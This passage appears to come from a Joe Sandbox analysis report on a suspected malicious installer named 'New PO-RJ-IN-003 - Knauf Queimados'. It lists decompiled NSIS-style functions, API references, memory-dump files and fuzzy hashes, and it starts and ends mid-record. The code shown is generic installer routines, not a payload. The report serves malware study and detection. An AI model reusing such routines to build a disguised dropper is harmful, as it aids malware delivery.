                                                                                                                          0x00404912
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048D1
                                                                                                                          • GetMessagePos.USER32 ref: 004048D9
                                                                                                                          • ScreenToClient.USER32 ref: 004048F3
                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404905
                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040492B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                                                                                          • Instruction ID: 15d2046a7114e84a1294b603ac72faee52eeac06783d2b716c70649c054a36c5
                                                                                                                          • Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                                                                                          • Instruction Fuzzy Hash: B0014071D00219BADB00DBA4DC45BFFBBBCAB99711F10412ABB10B62D0D7B465018BA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402B51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402B51(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BCD();
					_t19 = "unpacking data: %d%%";
					if( *0x423f90 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                          0x00402b5e
                                                                                                                          0x00402b6c
                                                                                                                          0x00402b72
                                                                                                                          0x00402b72
                                                                                                                          0x00402b80
                                                                                                                          0x00402b82
                                                                                                                          0x00402b8e
                                                                                                                          0x00402b93
                                                                                                                          0x00402b95
                                                                                                                          0x00402b95
                                                                                                                          0x00402ba0
                                                                                                                          0x00402bb0
                                                                                                                          0x00402bc2
                                                                                                                          0x00402bc2
                                                                                                                          0x00402bca

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                          • Opcode ID: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                                                                                                          • Instruction ID: 5842f070d0ba5c42680e32cc71ffb7420e94a61e96bc0cd7dd222547cc7ec007
                                                                                                                          • Opcode Fuzzy Hash: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                                                                                                          • Instruction Fuzzy Hash: 63F01D70900209ABEF206F60DD0ABEE3B79AB00305F00803AFA16B51D1D7B8AA558F59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004054A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004054A9(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407310;
				_v36.Group = 0x407310;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407300;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                                                                                                                          0x004054b4
                                                                                                                          0x004054b8
                                                                                                                          0x004054bb
                                                                                                                          0x004054c1
                                                                                                                          0x004054c5
                                                                                                                          0x004054c9
                                                                                                                          0x004054d1
                                                                                                                          0x004054d8
                                                                                                                          0x004054de
                                                                                                                          0x004054e5
                                                                                                                          0x004054f4
                                                                                                                          0x004054f6
                                                                                                                          0x00000000
                                                                                                                          0x004054f6
                                                                                                                          0x00405500
                                                                                                                          0x00405507
                                                                                                                          0x0040551d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040551f
                                                                                                                          0x00405523

                                                                                                                          APIs
                                                                                                                          • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004054EC
                                                                                                                          • GetLastError.KERNEL32 ref: 00405500
                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405515
                                                                                                                          • GetLastError.KERNEL32 ref: 0040551F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 3449924974-1246513382
                                                                                                                          • Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                                                                                          • Instruction ID: c62c2996f9e34dce87800cf524906665c2ca46c28120acb5782fde5c5d27446b
                                                                                                                          • Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                                                                                          • Instruction Fuzzy Hash: 2C010871D04219EAEF119FA5D9047EFBBB8EF04355F00457AE905B6180D378A644CBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402A4C Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E00402A4C(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x424030 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A4C(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406087(4);
					if(_t27 == 0) {
						if( *0x424030 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x424030, 0);
				}
				return _t18;
			}








                                                                                                                          0x00402a6d
                                                                                                                          0x00402a75
                                                                                                                          0x00402a9d
                                                                                                                          0x00402a87
                                                                                                                          0x00402ad7
                                                                                                                          0x00402add
                                                                                                                          0x00000000
                                                                                                                          0x00402adf
                                                                                                                          0x00402a9b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402a9b
                                                                                                                          0x00402ab2
                                                                                                                          0x00402aba
                                                                                                                          0x00402ac1
                                                                                                                          0x00402aed
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402af5
                                                                                                                          0x00402afd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402afd
                                                                                                                          0x00000000
                                                                                                                          0x00402ad0
                                                                                                                          0x00402ae4

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AB2
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AD7
                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1912718029-0
                                                                                                                          • Opcode ID: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                                                                                                          • Instruction ID: 0b2809d2fb64695319acfce79e26d11160b3b4f997347cbf6297b20c5f533aea
                                                                                                                          • Opcode Fuzzy Hash: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                                                                                                          • Instruction Fuzzy Hash: B3117F71A00009FFDF21AF90DE48DAF7B79EB44384B104076FA05B00A0DBB49E51AF69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A0C(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                          0x00401ccb
                                                                                                                          0x00401cd2
                                                                                                                          0x00401d01
                                                                                                                          0x00401d09
                                                                                                                          0x00401d10
                                                                                                                          0x00401d10
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00401CC5
                                                                                                                          • GetClientRect.USER32 ref: 00401CD2
                                                                                                                          • LoadImageA.USER32 ref: 00401CF3
                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                                                                                                          • Instruction ID: bd69cf0b23442afaa5089e63738db4ddecc40c485a2e91d601a614859fd6190e
                                                                                                                          • Opcode Fuzzy Hash: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                                                                                                          • Instruction Fuzzy Hash: 79F0FF72A04114AFDB00EBA4DD88DAFB77CFB44305B044536F601F6191C7789D419B79
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405882 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405882(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405634
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405819(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                                                                          0x0040588b
                                                                                                                          0x0040588b
                                                                                                                          0x00405892
                                                                                                                          0x00405895
                                                                                                                          0x0040589a
                                                                                                                          0x004058ad
                                                                                                                          0x004058c7
                                                                                                                          0x00000000
                                                                                                                          0x004058c7
                                                                                                                          0x004058b1
                                                                                                                          0x004058b2
                                                                                                                          0x004058b5
                                                                                                                          0x004058b6
                                                                                                                          0x004058be
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004058c0
                                                                                                                          0x004058c3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004058c3
                                                                                                                          0x00000000
                                                                                                                          0x004058a3
                                                                                                                          0x00000000
                                                                                                                          0x004058a4

                                                                                                                          APIs
                                                                                                                          • CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405890
                                                                                                                          • CharNextA.USER32(00000000), ref: 00405895
                                                                                                                          • CharNextA.USER32(00000000), ref: 004058A4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext
                                                                                                                          • String ID: 4V@$C:\
                                                                                                                          • API String ID: 3213498283-1503405514
                                                                                                                          • Opcode ID: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                                                                                                          • Instruction ID: c672ca698b2e1da82c16c1c95d0afa497de5c4bc474b1e42a417a68fd1ebbade
                                                                                                                          • Opcode Fuzzy Hash: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                                                                                                          • Instruction Fuzzy Hash: 65F0A753954F2155F72232644C44B7B5BACDF55711F14C47BE900F61D182BC5CB28FAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004047AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E004047AC(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D1D(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D1D(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D1D(_t41, _t47, 0x420580, 0x420580, _a8);
				wsprintfA(_t32 + lstrlenA(0x420580), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423758, _a4, 0x420580);
			}



















                                                                                                                          0x004047b2
                                                                                                                          0x004047b7
                                                                                                                          0x004047bf
                                                                                                                          0x004047c0
                                                                                                                          0x004047cd
                                                                                                                          0x004047d5
                                                                                                                          0x004047d6
                                                                                                                          0x004047d8
                                                                                                                          0x004047da
                                                                                                                          0x004047dc
                                                                                                                          0x004047df
                                                                                                                          0x004047df
                                                                                                                          0x004047e6
                                                                                                                          0x004047ec
                                                                                                                          0x004047ec
                                                                                                                          0x004047f3
                                                                                                                          0x004047fa
                                                                                                                          0x004047fd
                                                                                                                          0x00404800
                                                                                                                          0x00404800
                                                                                                                          0x00404804
                                                                                                                          0x00404814
                                                                                                                          0x00404816
                                                                                                                          0x00404819
                                                                                                                          0x004047c2
                                                                                                                          0x004047c2
                                                                                                                          0x004047c9
                                                                                                                          0x004047c9
                                                                                                                          0x00404821
                                                                                                                          0x0040482c
                                                                                                                          0x00404842
                                                                                                                          0x00404852
                                                                                                                          0x0040486e

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                                                                                                          • wsprintfA.USER32 ref: 00404852
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00404865
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                          • Opcode ID: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                                                                                                          • Instruction ID: 71df96092b2c0d2c51d4f9b386e12500524326f2c654dceed31374545f8d5b50
                                                                                                                          • Opcode Fuzzy Hash: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                                                                                                          • Instruction Fuzzy Hash: C411E77364412437DB0075699C46EAF3299DFC6374F244637FA25F31D2EA788C5285AC
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E004029EF(3);
				 *(_t55 + 8) = E004029EF(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A0C(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A0C(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A0C();
					_t28 = E00402A0C();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029EF();
					_t37 = E004029EF();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405C59();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                                          0x00401bb6
                                                                                                                          0x00401bc2
                                                                                                                          0x00401bc5
                                                                                                                          0x00401bce
                                                                                                                          0x00401bce
                                                                                                                          0x00401bd1
                                                                                                                          0x00401bd5
                                                                                                                          0x00401bde
                                                                                                                          0x00401bde
                                                                                                                          0x00401be1
                                                                                                                          0x00401be5
                                                                                                                          0x00401be7
                                                                                                                          0x00401c34
                                                                                                                          0x00401c36
                                                                                                                          0x00401c3f
                                                                                                                          0x00401c47
                                                                                                                          0x00401c4a
                                                                                                                          0x00401c4a
                                                                                                                          0x00401c53
                                                                                                                          0x00000000
                                                                                                                          0x00401be9
                                                                                                                          0x00401bf0
                                                                                                                          0x00401bf2
                                                                                                                          0x00401bfa
                                                                                                                          0x00401bfd
                                                                                                                          0x00401c25
                                                                                                                          0x00401c59
                                                                                                                          0x00401c59
                                                                                                                          0x00401bff
                                                                                                                          0x00401c0d
                                                                                                                          0x00401c15
                                                                                                                          0x00401c18
                                                                                                                          0x00401c18
                                                                                                                          0x00401bfd
                                                                                                                          0x00401c5c
                                                                                                                          0x00401c5f
                                                                                                                          0x00401c65
                                                                                                                          0x00402849
                                                                                                                          0x00402849
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0

                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
